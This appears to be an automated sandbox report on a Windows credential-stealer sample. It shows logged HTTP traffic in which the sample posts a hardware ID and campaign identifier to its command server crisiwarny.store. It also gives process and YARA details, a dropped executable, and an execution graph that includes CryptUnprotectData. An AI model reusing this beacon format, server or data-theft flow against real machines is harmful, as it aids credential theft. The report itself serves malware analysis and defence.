                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: c4 a3 46 0a 03 52 43 c6 7a 02 7e 8c e9 0e 3b 96 af 9d 54 05 eb 05 9a e9 e7 fd b5 f7 e3 8a aa d6 b6 f6 42 60 63 26 9c 9b 5d 2f 01 ae fb 74 c2 e4 77 d5 c4 3c fd 06 91 c5 91 b0 8d 0c 89 97 75 cf ec 4d 28 b0 f8 2d a3 e1 73 e5 1a b9 13 ab f0 80 d7 a1 27 86 2d 39 e3 bb 90 5b 1c 07 af e0 9a 3e 2f 97 4b f0 d6 5c d0 27 f3 8c fb b2 5f b7 ee 7e bc f5 f7 e0 69 db 9d 07 6f f7 19 67 d6 7f 08 f4 ce 1f 4a c7 a0 eb ac 9c 07 89 49 9d f1 79 87 0d 3f 2e 3a 5c ad 90 e5 0a d6 33 34 de fe cf 11 77 66 9a 35 e8 fa 93 02 6e ca 94 47 4b b9 df 20 3b 5e d8 6c 71 c8 cf 1e 69 02 69 be 60 6c a7 30 b9 1e f5 08 ad f5 61 1a 40 50 1f 98 6d 2f ce 57 0a 4c a9 db a0 b7 31 17 17 22 03 c2 93 3e db 80 e4 23 50 0b 7b f9 87 55 ba 7e 48 2f 2c 7f 1b fc 36 4a 92 6a f4 3d c4 6b 91 6a 79 8e 35 6a 2f 02
                                                                                                    Data Ascii: FRCz~;TB`c&]/tw<uM(-s'-9[>/K\'_~iogJIy?.:\34wf5nGK ;^lqii`l0a@Pm/WL1">#P{U~H/,6Jj=kjy5j/
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 14 6f 8f dd 67 09 6b 56 cc 5c 95 9f 7b 5a ed 1c dc ea c7 35 f2 ee 20 37 4d e9 ef ed d7 06 86 73 e7 75 7e 8f 6b cb 9e 84 80 21 2b 4d 18 67 6a ee 34 fe ca a9 a8 97 3e 70 ed 28 4b 8c e9 e7 fe 7c 1a e7 09 4e 2c 0c 14 4b ec 88 0d fe e1 63 ee af 35 b4 65 02 c1 b9 57 5f 66 1a 2d 1e c4 df df ef 0e 4b d6 7c ac 32 54 8f ba 2a 06 9e f4 04 69 b5 ac b4 38 e9 de 06 56 bc 5b 4d a7 cc db 75 43 35 96 3e c5 19 20 c1 e2 44 75 e0 4b 95 fb 43 1b 2f c8 77 48 45 f3 5b eb 8c d8 9f 21 8f d7 98 ba 06 0b c1 7a b4 b7 29 43 55 bc 93 70 f9 9b f0 f1 65 71 90 62 1e 58 54 61 7b 88 1b 8e b8 25 06 94 c5 85 ad 5e f3 0c 19 b2 65 99 3c 4b d5 2d 02 90 49 bb 43 53 31 fe 97 5e eb 33 37 20 0b ce 91 de 64 46 85 28 de b1 2c 9f 7a 2d 5c bf 91 19 b8 f9 56 44 c6 ce 88 fd 3d eb ab f9 b8 f6 e0 d8 b0 43
                                                                                                    Data Ascii: ogkV\{Z5 7Msu~k!+Mgj4>p(K|N,Kc5eW_f-K|2T*i8V[MuC5> DuKC/wHE[!z)CUpeqbXTa{%^e<K-ICS1^37 dF(,z-\VD=C
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: f4 75 d9 b8 3b ad 78 af 6a 14 fd 9e c0 0f 08 cb c2 ac 63 64 b0 93 e6 58 0b 0c 8b 2a 3a d2 fd f5 c4 bc ed 46 5d c1 93 ac f4 48 43 a0 8f 30 31 7c ce a4 3c 0a 22 cc 0c 3b 0e 53 55 d7 d7 7f 16 d4 ba 4d 86 48 48 8d a4 3f 3c 53 4b 2e 01 48 c4 d9 d2 fa 8c 2b 05 57 49 84 c8 13 49 08 b5 43 38 2a 93 2c 17 e3 51 ba c2 fc 36 f7 ba 74 f0 b7 51 f8 b1 ff af 04 52 13 99 e5 7f fa 3d 76 79 ce c2 ed f0 7f 65 41 c2 5e f1 cf 48 88 5a f0 46 53 20 ef 2b 94 f5 35 92 91 b3 53 11 b7 7f 85 d5 e2 f1 f5 fd ef 61 ac 88 5a cf 76 17 6a ca 43 3e d1 fd 26 71 c7 b1 78 3f 32 58 6b 3b ad 00 a0 0a 82 54 6a 18 93 d8 73 20 e8 0a bf a2 f4 04 85 7e 98 ff fb 09 13 24 7e 05 35 cd 97 55 18 e9 66 ac b3 1f 68 06 a4 df c1 d9 9e 76 96 34 c3 90 06 e8 ba 96 d5 e1 10 0c 21 70 dd 2a ad a3 86 64 f9 03 4b 3e
                                                                                                    Data Ascii: u;xjcdX*:F]HC01|<";SUMHH?<SK.H+WIIC8*,Q6tQR=vyeA^HZFS +5SaZvjC>&qx?2Xk;Tjs ~$~5Ufhv4!p*dK>
                                                                                                    2024-10-28 06:18:35 UTC15331OUTData Raw: 31 f1 f3 8d cf e5 b2 e5 97 21 57 da b7 06 0c 45 bc b8 f4 3f 4c bb 38 d3 ef 0d 18 1b c8 ff b6 1b fc 26 fd 9f cd 26 99 18 78 37 a9 f3 90 7e 7f d3 69 1a 9d 41 3c f5 80 ad d5 40 9a a7 30 9a 4c 82 4a 38 26 5e 74 73 45 98 81 2f 76 7a 68 9b d8 44 2b c4 4f f8 ac 05 a4 8c 09 94 c9 5b e3 f6 0c d4 fb 58 93 37 4a b8 f9 e1 e3 8f 2d 98 ae 38 6a ee 62 96 1c 1e 5f 7e 0b e0 23 2a 60 87 15 6b 16 b1 f2 73 3f df b7 b1 8a 76 fb fd 26 b4 7d f8 8e 2a df bc 7e a7 ab 09 48 be 82 dd ba f4 3a b8 f0 b8 b6 37 5f 82 af 01 f6 41 e6 80 06 5b 54 5a 10 05 c2 7b 61 d3 e2 95 b6 35 59 8b 27 bd 9e 23 bc c3 15 53 f8 ec 55 71 6b 63 b4 fe 68 07 03 73 c0 a8 14 82 bc df df 98 66 61 40 ce c3 43 24 14 cd a9 23 c2 d3 ee 69 05 6e 72 f6 11 27 21 9e 9a bb 4e 6a 2b 68 33 d4 53 65 b3 92 d2 08 28 90 a3 28
                                                                                                    Data Ascii: 1!WE?L8&&x7~iA<@0LJ8&^tsE/vzhD+O[X7J-8jb_~#*`ks?v&}*~H:7_A[TZ{a5Y'#SUqkchsfa@C$#inr'!Nj+h3Se((
                                                                                                    2024-10-28 06:18:39 UTC1017INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=s91umq5qh990hrdlvmnn8a059u; expires=Fri, 21 Feb 2025 00:05:16 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKrxaZn6wKIsH3ynOie9G0WNYH2OmF2Grp4cq4%2FbzPfzrUyMStjYRXhl4oUtvtGk8hsFnYZ3bNBVZQZk%2BvpgGvVw9m88eCObYQ4%2BGB%2B5VNloT56wStDaVpxoFOcMCaS239P3"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf364e452c85-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=211&recv=605&lost=0&retrans=0&sent_bytes=2838&recv_bytes=572240&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=4d95a127ce12947e&ts=3635&x=0"


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.849713104.21.95.914434936C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-28 06:18:40 UTC264OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 87
                                                                                                    Host: crisiwarny.store
                                                                                                    2024-10-28 06:18:40 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 36 31 34 37 31 44 36 30 41 37 35 43 42 41 34 41 44 33 36 41 33 30 30 35 34 38 38 31 33 33 36 43
                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=61471D60A75CBA4AD36A30054881336C
                                                                                                    2024-10-28 06:18:41 UTC1009INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 28 Oct 2024 06:18:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=8ud1cchqbca7mji6vbjq2lqv0p; expires=Fri, 21 Feb 2025 00:05:20 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eVOxvJt7SloxysjrLjlh97cSsfuAnVWjDrOhFSm822qHw0eu6vmPZm2ugmzWA0AQKYYzNOW%2FPKq9UT6DsiqCm7r%2FXiWdUfum69BWRuGx2hB%2BgLToGQZuFR%2Bwtv3CHiRWtMF"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d98cf50d8d3e6fe-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1371&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=2067094&cwnd=37&unsent_bytes=0&cid=9741d6a2ed471449&ts=1177&x=0"
                                                                                                    2024-10-28 06:18:41 UTC130INData Raw: 37 63 0d 0a 66 32 69 34 35 4e 79 54 36 38 56 47 32 31 54 68 7a 65 45 42 4c 39 7a 6e 56 47 7a 6a 63 59 71 4a 4d 37 56 74 68 55 47 71 54 4b 6f 6b 45 35 71 52 2f 71 6e 4a 72 54 4b 76 4a 4e 75 52 7a 6c 30 41 37 64 39 68 51 74 46 41 76 36 63 43 68 46 36 72 63 4a 77 51 68 52 41 4f 33 72 6a 7a 39 34 36 6a 61 4c 34 73 68 4f 2f 4e 49 30 6d 6f 78 57 35 63 7a 31 50 76 71 77 6d 46 45 4e 67 3d 0d 0a
                                                                                                    Data Ascii: 7cf2i45NyT68VG21ThzeEBL9znVGzjcYqJM7VthUGqTKokE5qR/qnJrTKvJNuRzl0A7d9hQtFAv6cChF6rcJwQhRAO3rjz946jaL4shO/NI0moxW5cz1PvqwmFENg=
                                                                                                    2024-10-28 06:18:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:02:18:22
                                                                                                    Start date:28/10/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x870000
                                                                                                    File size:2'958'336 bytes
                                                                                                    MD5 hash:65397ED2AE0567709B177F41D0668597
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:02:18:47
                                                                                                    Start date:28/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe"
                                                                                                    Imagebase:0x550000
                                                                                                    File size:2'869'760 bytes
                                                                                                    MD5 hash:89595DF1365EF9A4D1CB06E2E56DE5E1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.1%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:60.6%
                                                                                                      Total number of Nodes:213
                                                                                                      Total number of Limit Nodes:17
                                                                                                      execution_graph 8810 88d7f8 8811 88d7fd 8810->8811 8812 8b4880 LdrInitializeThunk 8811->8812 8814 88d80c 8812->8814 8813 88d849 8817 88d90e 8813->8817 8818 88db7e 8813->8818 8820 8b0f10 LdrInitializeThunk 8813->8820 8814->8813 8815 8b4950 LdrInitializeThunk 8814->8815 8814->8817 8814->8818 8815->8813 8817->8818 8819 88db5f CryptUnprotectData 8817->8819 8819->8818 8820->8817 8594 887089 8595 8870d0 8594->8595 8598 88d010 8595->8598 8597 8870f3 8599 88d190 8598->8599 8599->8599 8612 8b4520 8599->8612 8601 88d30c 8602 88d32f 8601->8602 8605 88d35e 8601->8605 8607 88d688 8601->8607 8608 88d561 8601->8608 8611 88d36d 8601->8611 8616 8b4880 8601->8616 8602->8605 8602->8607 8602->8608 8602->8611 8620 8b4950 8602->8620 8605->8607 8605->8608 8605->8611 8626 8b0f10 LdrInitializeThunk 8605->8626 8607->8607 8610 8b4520 LdrInitializeThunk 8607->8610 8608->8608 8609 8b4520 LdrInitializeThunk 8608->8609 8609->8607 8610->8607 8611->8597 8611->8611 8613 8b4540 8612->8613 8613->8613 8614 8b467e 8613->8614 8627 8b0f10 LdrInitializeThunk 8613->8627 8614->8601 8618 8b48a0 8616->8618 8617 8b48fe 8617->8602 8618->8617 8628 8b0f10 LdrInitializeThunk 8618->8628 8621 8b4970 8620->8621 8624 8b49ce 8621->8624 8629 8b0f10 LdrInitializeThunk 8621->8629 8622 8b4a7e 8622->8605 8624->8622 8630 8b0f10 LdrInitializeThunk 8624->8630 8626->8608 8627->8614 8628->8617 8629->8624 8630->8622 8821 88b8db 8826 8b4ad0 8821->8826 8823 88b975 8824 88b904 8824->8823 8832 8b0f10 LdrInitializeThunk 8824->8832 8827 8b4af0 8826->8827 8829 8b4b4e 8827->8829 8833 8b0f10 LdrInitializeThunk 8827->8833 8828 8b4bfe 8828->8824 8829->8828 8829->8829 8834 8b0f10 LdrInitializeThunk 8829->8834 8832->8824 8833->8829 8834->8828 8631 88b1ac 8634 8b3a90 8631->8634 8635 88b1e2 CreateProcessW 8634->8635 8835 881bfc 8837 881a5a 8835->8837 8836 881e18 8837->8835 8837->8836 8838 8ae210 RtlFreeHeap 8837->8838 8838->8837 8636 88104f 8643 881054 8636->8643 8637 88127c 8668 8979b0 8637->8668 8638 881378 CoUninitialize 8648 8813b0 8638->8648 8639 88132a 8639->8638 8641 8979b0 LdrInitializeThunk 8644 8811f4 8641->8644 8642 88149f 8643->8637 8643->8639 8643->8641 8643->8642 8678 898290 8644->8678 8645 8812a2 8647 898290 3 API calls 8645->8647 8650 8812da 8647->8650 8648->8642 8648->8648 8659 88174d 8648->8659 8713 8b0f10 LdrInitializeThunk 8648->8713 8649 88122c 8684 89ab20 8649->8684 8652 89ab20 3 API calls 8650->8652 8654 8812fc 8652->8654 8656 89b070 3 API calls 8654->8656 8658 881305 8656->8658 8657 881257 8703 89dba0 8657->8703 8661 89dba0 LdrInitializeThunk 8658->8661 8659->8642 8714 8b0f10 LdrInitializeThunk 8659->8714 8665 88130e 8661->8665 8708 89cbd0 8665->8708 8670 897a20 8668->8670 8670->8670 8715 8b46d0 8670->8715 8672 897ef2 8672->8672 8722 895390 8672->8722 8674 897dd0 8674->8645 8675 897c31 8675->8672 8675->8674 8675->8675 8676 8b46d0 LdrInitializeThunk 8675->8676 8677 897db7 8675->8677 8676->8677 8677->8672 8677->8674 8719 895540 8677->8719 8679 89829e 8678->8679 8731 8b4c40 8679->8731 8681 89837a 8683 898045 8681->8683 8735 8b5040 8681->8735 8683->8649 8685 89ab40 8684->8685 8686 89abae 8685->8686 8755 8b0f10 LdrInitializeThunk 8685->8755 8687 88124e 8686->8687 8688 8ae1b0 RtlAllocateHeap 8686->8688 8694 89b070 8687->8694 8691 89ac63 8688->8691 8690 8ae210 RtlFreeHeap 8690->8687 8693 89acee 8691->8693 8756 8b0f10 LdrInitializeThunk 8691->8756 8693->8690 8757 89b090 8694->8757 8696 89b084 8696->8657 8697 89b079 8697->8696 8698 8ac4c0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 8697->8698 8702 89bbf4 8698->8702 8699 89bc29 8699->8657 8700 8b4520 LdrInitializeThunk 8700->8702 8701 8b4880 LdrInitializeThunk 8701->8702 8702->8699 8702->8700 8702->8701 8704 89dc40 8703->8704 8704->8704 8705 8b4520 LdrInitializeThunk 8704->8705 8706 89dcdc 8705->8706 8707 8b4880 LdrInitializeThunk 8706->8707 8707->8706 8712 89cc20 8708->8712 8709 89cedf 8709->8639 8710 8b4880 LdrInitializeThunk 8710->8712 8711 8b4520 LdrInitializeThunk 8711->8712 8712->8709 8712->8710 8712->8711 8712->8712 8713->8659 8714->8642 8716 8b46f0 8715->8716 8716->8716 8717 8b482e 8716->8717 8730 8b0f10 LdrInitializeThunk 8716->8730 8717->8675 8720 8b4520 LdrInitializeThunk 8719->8720 8721 895595 8720->8721 8723 8953ee 8722->8723 8724 8953e1 8722->8724 8725 89551d 8722->8725 8726 8954a1 8722->8726 8728 895540 LdrInitializeThunk 8723->8728 8727 895540 LdrInitializeThunk 8724->8727 8725->8674 8726->8725 8726->8726 8729 895540 LdrInitializeThunk 8726->8729 8727->8726 8728->8724 8729->8725 8730->8717 8733 8b4c60 8731->8733 8732 8b4d3f 8732->8681 8733->8732 8745 8b0f10 LdrInitializeThunk 8733->8745 8738 8b5060 8735->8738 8736 8b50be 8737 8b5314 8736->8737 8747 8ae1b0 8736->8747 8737->8681 8738->8736 8746 8b0f10 LdrInitializeThunk 8738->8746 8742 8b50ff 8744 8b517e 8742->8744 8750 8b0f10 LdrInitializeThunk 8742->8750 8751 8ae210 8744->8751 8745->8732 8746->8736 8748 8ae1d0 8747->8748 8748->8748 8749 8ae1f8 RtlAllocateHeap 8748->8749 8749->8742 8750->8744 8752 8ae228 RtlFreeHeap 8751->8752 8753 8ae2b0 8751->8753 8752->8753 8753->8737 8755->8686 8756->8693 8758 89b0f0 8757->8758 8758->8758 8761 8ae2c0 8758->8761 8762 8ae2f0 8761->8762 8763 8ae34e 8762->8763 8771 8b0f10 LdrInitializeThunk 8762->8771 8764 8ae1b0 RtlAllocateHeap 8763->8764 8768 89b155 8763->8768 8766 8ae3cc 8764->8766 8769 8ae43e 8766->8769 8772 8b0f10 LdrInitializeThunk 8766->8772 8767 8ae210 RtlFreeHeap 8767->8768 8769->8767 8771->8763 8772->8769 8839 87cf90 8843 87cfb0 8839->8843 8840 87d1c4 ExitProcess 8841 87d1ba 8841->8840 8843->8840 8843->8841 8846 87e1a0 8843->8846 8844 87d1b1 8844->8841 8852 880b90 CoInitializeEx 8844->8852 8847 87e1c0 8846->8847 8847->8847 8848 87ec20 RtlFreeHeap 8847->8848 8849 87e284 8847->8849 8851 87e485 8847->8851 8848->8847 8849->8844 8850 8ae210 RtlFreeHeap 8850->8849 8851->8849 8851->8850 8773 880ca0 CoInitializeSecurity 8775 880cc2 8773->8775 8774 88103d 8775->8774 8776 8ae210 RtlFreeHeap 8775->8776 8776->8775 8777 88f522 8779 88f520 8777->8779 8778 88f696 8783 891100 8778->8783 8779->8777 8779->8778 8780 88f6e8 8779->8780 8782 8b46d0 LdrInitializeThunk 8779->8782 8782->8779 8784 89112a 8783->8784 8786 8911b8 8783->8786 8784->8784 8784->8786 8795 891ac0 8784->8795 8786->8786 8799 88cc20 8786->8799 8788 891206 8789 88cc20 LdrInitializeThunk 8788->8789 8790 8912e6 8789->8790 8791 88cc20 LdrInitializeThunk 8790->8791 8792 8913aa 8791->8792 8793 88cc20 LdrInitializeThunk 8792->8793 8794 89144c 8793->8794 8796 891ae0 8795->8796 8797 895390 LdrInitializeThunk 8796->8797 8798 891e96 8797->8798 8800 88cc40 8799->8800 8800->8800 8801 8b4520 LdrInitializeThunk 8800->8801 8802 88cd10 8801->8802 8803 88cd2f 8802->8803 8804 8b4880 LdrInitializeThunk 8802->8804 8805 88cd5d 8802->8805 8806 88cd6e 8802->8806 8803->8805 8803->8806 8807 8b4950 LdrInitializeThunk 8803->8807 8804->8803 8805->8806 8809 8b0f10 LdrInitializeThunk 8805->8809 8806->8788 8807->8805 8809->8806 8853 88a794 8856 8b4370 8853->8856 8855 88a7e7 8857 8b4390 8856->8857 8858 8b44be 8857->8858 8860 8b0f10 LdrInitializeThunk 8857->8860 8858->8855 8860->8858

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 87ec20-87ec51 1 87ec60-87eca2 0->1 1->1 2 87eca4-87ed9f 1->2 3 87eda0-87eda8 2->3 3->3 4 87edaa-87eddf 3->4 5 87ede0-87ee1f 4->5 5->5 6 87ee21-87ee46 call 87fa80 5->6 8 87ee4b-87ee50 6->8 9 87ee56-87ee79 8->9 10 87efb4-87efb6 8->10 11 87ee80-87eed2 9->11 12 87f13a-87f146 10->12 11->11 13 87eed4-87eeda 11->13 14 87eee0-87eeea 13->14 15 87eef1-87eef5 14->15 16 87eeec-87eeef 14->16 17 87f131-87f137 call 8ae210 15->17 18 87eefb-87ef1f 15->18 16->14 16->15 17->12 19 87ef20-87ef67 18->19 19->19 21 87ef69-87ef79 19->21 23 87efbb-87efbd 21->23 24 87ef7b-87ef81 21->24 25 87efc3-87efff 23->25 26 87f12f 23->26 27 87ef97-87ef9b 24->27 28 87f000-87f025 25->28 26->17 27->26 29 87efa1-87efa8 27->29 28->28 30 87f027-87f033 28->30 31 87efae 29->31 32 87efaa-87efac 29->32 33 87f035-87f03f 30->33 34 87f074-87f076 30->34 35 87ef90-87ef95 31->35 36 87efb0-87efb2 31->36 32->31 37 87f057-87f05b 33->37 34->26 38 87f07c-87f099 34->38 35->23 35->27 36->35 37->26 39 87f061-87f068 37->39 40 87f0a0-87f0ba 38->40 41 87f06e 39->41 42 87f06a-87f06c 39->42 40->40 43 87f0bc-87f0c6 40->43 44 87f050-87f055 41->44 45 87f070-87f072 41->45 42->41 46 87f100-87f102 43->46 47 87f0c8-87f0d7 43->47 44->34 44->37 45->44 48 87f10c-87f12d call 87e990 46->48 49 87f0e7-87f0eb 47->49 48->17 49->26 50 87f0ed-87f0f4 49->50 52 87f0f6-87f0f8 50->52 53 87f0fa 50->53 52->53 55 87f0e0-87f0e5 53->55 56 87f0fc-87f0fe 53->56 55->49 57 87f104-87f10a 55->57 56->55 57->26 57->48
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                                      • API String ID: 0-600622405
                                                                                                      • Opcode ID: c189bb82f972a0bdbf2679a895d9aa44411821bf10955d9cde5d1694fcb07caa
                                                                                                      • Instruction ID: 22fef9200174e231743aff6683ed81cfd133281d2615c2ba010e22039a40f049
                                                                                                      • Opcode Fuzzy Hash: c189bb82f972a0bdbf2679a895d9aa44411821bf10955d9cde5d1694fcb07caa
